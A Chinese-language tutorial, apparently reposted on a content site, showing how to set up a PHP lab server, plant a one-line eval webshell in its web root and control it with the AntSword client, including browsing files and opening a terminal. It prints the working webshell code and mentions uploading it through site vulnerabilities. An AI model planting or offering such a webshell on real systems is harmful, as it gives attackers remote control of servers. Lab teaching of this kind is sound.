蚁剑连接一句话木马演示

这篇具有很好参考价值的文章主要介绍了蚁剑连接一句话木马演示。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

需要准备

一台虚拟机作为服务器,一台作为攻击机(可用主机),将虚拟机的网络都设置为桥接。

我这里服务器用win2008R2系统

攻击机用win10

接下来我会演示 php 的一句话木马

其他脚本语言的一句话木马使用过程和这个差别不大

在服务器上安装phpstudy 快速搭建服务器

jsp一句话木马蚁剑,工具使用,安全,php,扫描测试工具,渗透测试

安装成功后启动apache

jsp一句话木马蚁剑,工具使用,安全,php,扫描测试工具,渗透测试

尝试打开网站,看看是否成功

jsp一句话木马蚁剑,工具使用,安全,php,扫描测试工具,渗透测试

出现下面的页面代表成功

jsp一句话木马蚁剑,工具使用,安全,php,扫描测试工具,渗透测试

现在服务端就配置成功了

现在在攻击端安装菜刀,蚁剑等等类似工具,可以去看怎么安装蚁剑

安装中国蚁剑_undefine-CSDN博客

安装好后尝试用浏览器进入服务器搭建的网站(必须先设置好桥接)

输入服务器ip即可

查看服务器ip\

jsp一句话木马蚁剑,工具使用,安全,php,扫描测试工具,渗透测试

在win10中成功连接网站

jsp一句话木马蚁剑,工具使用,安全,php,扫描测试工具,渗透测试

正常情况下需要通过查找网站的漏洞,将一句话木马上传到网站上,但是呢我现在只是演示怎么使用一句话木马的,所以我直接将一句话木马复制到网站中,因为我搭建的网站是php,所以就用php的一句话木马,一句话木马还有asp,jsp之类的,不过不一定像php一样短

Php的一句话木马很简单,就是创建一个文本,写入

<?php eval($_REQUEST[123])?>即可

123就是你用来控制的密码,可以随便取

网上有很多,可以自己去查

将后缀改为.php即可

打开网站的根目录

jsp一句话木马蚁剑,工具使用,安全,php,扫描测试工具,渗透测试

将一句话木马放进去

jsp一句话木马蚁剑,工具使用,安全,php,扫描测试工具,渗透测试

要记住它的文件名还有路径,我这里放在根目录所以就不用记路径了,这点也说明了当你想尽办法把木马上传到网站的时候,却不知道它在哪里也是没有用的。

回到攻击端,打开蚁剑

右键空白区域

jsp一句话木马蚁剑,工具使用,安全,php,扫描测试工具,渗透测试

选择添加数据

然后输入一句话木马位置,和连接的密码,编码方式随便

jsp一句话木马蚁剑,工具使用,安全,php,扫描测试工具,渗透测试

点击测试连接,显示连接成功说明一句话木马可用

jsp一句话木马蚁剑,工具使用,安全,php,扫描测试工具,渗透测试

然后点添加就可以添加到目录了

jsp一句话木马蚁剑,工具使用,安全,php,扫描测试工具,渗透测试

双击即可查看对方目录

jsp一句话木马蚁剑,工具使用,安全,php,扫描测试工具,渗透测试

还可以右键目标打开终端,输入命令,不过能够用什么命令还得看你有什么权限,这就涉及提权了

jsp一句话木马蚁剑,工具使用,安全,php,扫描测试工具,渗透测试

还有很多的功能比如上传下载,不过这就要自己摸索,查看蚁剑的文档了文章来源地址https://www.toymoban.com/news/detail-620922.html

到了这里,关于蚁剑连接一句话木马演示的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 你真的了解一句话木马吗?

    目录 一、前言: 二、什么是一句话木马: 三、常见的一句话木马: 木马讲解: 1、$_POST[cmd] 2、eval() 3、\\\"@\\\" 4、脉络梳理 四、可用于条件竞争的一句话木马: 木马讲解: 1、fopen() 2、fputs()  3、脉络梳理 五、图片马 1、什么是图片马: 2、.htaccess 3、木马图片 4.   .user.ini扩展

    2024年02月04日
    浏览(51)
  • 渗透干货|史上最全一句话木马

    PHP //可执行命令一句话 普通一句话 PHP系列 过狗一句话 【----帮助网安学习,以下所有学习资料文末免费领!----】 几个变性的php–过防火墙 过狗效果都不错: 密码-7 phpv9 高版本拿shell ASP asp 一句话 ASP过安全狗一句话 ASPX系列 ASPX一句话的 过安全狗效果不怎么样 不过我认为能

    2024年04月25日
    浏览(45)
  • 一句话木马攻击复现:揭示黑客入侵的实战过程

    这篇文章旨在用于网络安全学习,请勿进行任何非法行为,否则后果自负。 准备环境 OWASP虚拟机 xfp 7与xshell 7 ​  DVWA系统默认的账号密码均为:admin/admin  ​ 攻击payload 这个命令的目的是在服务器上创建一个名为 shell.php 的文件,其中包含 PHP 代码。让我们逐步分析该命令:

    2024年02月11日
    浏览(54)
  • 上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)

       可抓包后修改扩展名为图片格式,再上传可绕过验证。如:   可以修改php文件后缀为其他,再上传。如test.php.xxx  可对图片文件添加一句话木马,再修改为.php上传,会解析为图片上传此文件。    客户端验证绕过的方法有:  例:   1)木马分为大马、小马和一句话木马:

    2024年02月11日
    浏览(44)
  • 5个国内优秀的AI绘画工具,一句话就能生成精美图片,太厉害了_国内ai生成图片

    先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7 深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前! 因此收集整理了一份《2024年最新Python全套学习资料》,初

    2024年04月25日
    浏览(41)
  • 一句话生成长视频

    前段时间,我曾经介绍过Imagen Video模型。它能够在输入一句话中,生成5~6秒的视频。而且由于采用了“空间高分辨率模型”和“时域高分辨率模型”的级联模型,它能够清晰度在1280×768的高清视频。具体的介绍可以回看我之前写的文章: 短视频模型Imagen Video:艺术和3D建模大

    2023年04月09日
    浏览(42)
  • 一句话画出动漫效果

     链接: AI Comic Factory - a Hugging Face Space by jbilcke-hf Discover amazing ML apps made by the community https://huggingface.co/spaces/jbilcke-hf/ai-comic-factory 选择类型: Japanese  输入提示词: 效果如下:

    2024年02月10日
    浏览(57)
  • 一句话解释什么是出口IP

    出口 IP 是指从本地网络连接到公共互联网时所使用的 IP 地址。这个 IP 地址是由 Internet 服务提供商(ISP)分配给你的,它可以用来标识你的网络流量的来源。如果你使用的是 NAT(网络地址转换)技术,则在 NAT 设备内部会进行地址转换,使得多个设备可以共享同一个公共 I

    2024年02月08日
    浏览(41)
  • 文件上传漏洞—一句话图片马制作

    提要 :在文件上传漏洞中,通常需要上传脚本类型的文件至服务端执行,获取WebShell,但是网站会严格过滤脚本类型的文件,这个时候便可以通过图片马来尝试突破。 简介 :在图片格式文件(JPG,PNG和GIF等)中添加隐藏一句话木马,利用文件包含漏洞,Web容器解析漏洞和.

    2024年02月07日
    浏览(52)
  • 解封ChatGPT我只用了一句话

    文章前言 ChatGPT作为一个AI语言模型可以帮助使用者生成各种各样的文字内容,目前已被广泛应用于各种语言任务中,例如:文本生成、机器翻译、问答系统等,基于保障使用者权益和维护良好的价值观,官方限制ChatGPT不能回答不当言论(攻击或侮辱性)、敏感内容和带有偏见的

    2024年02月16日
    浏览(39)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包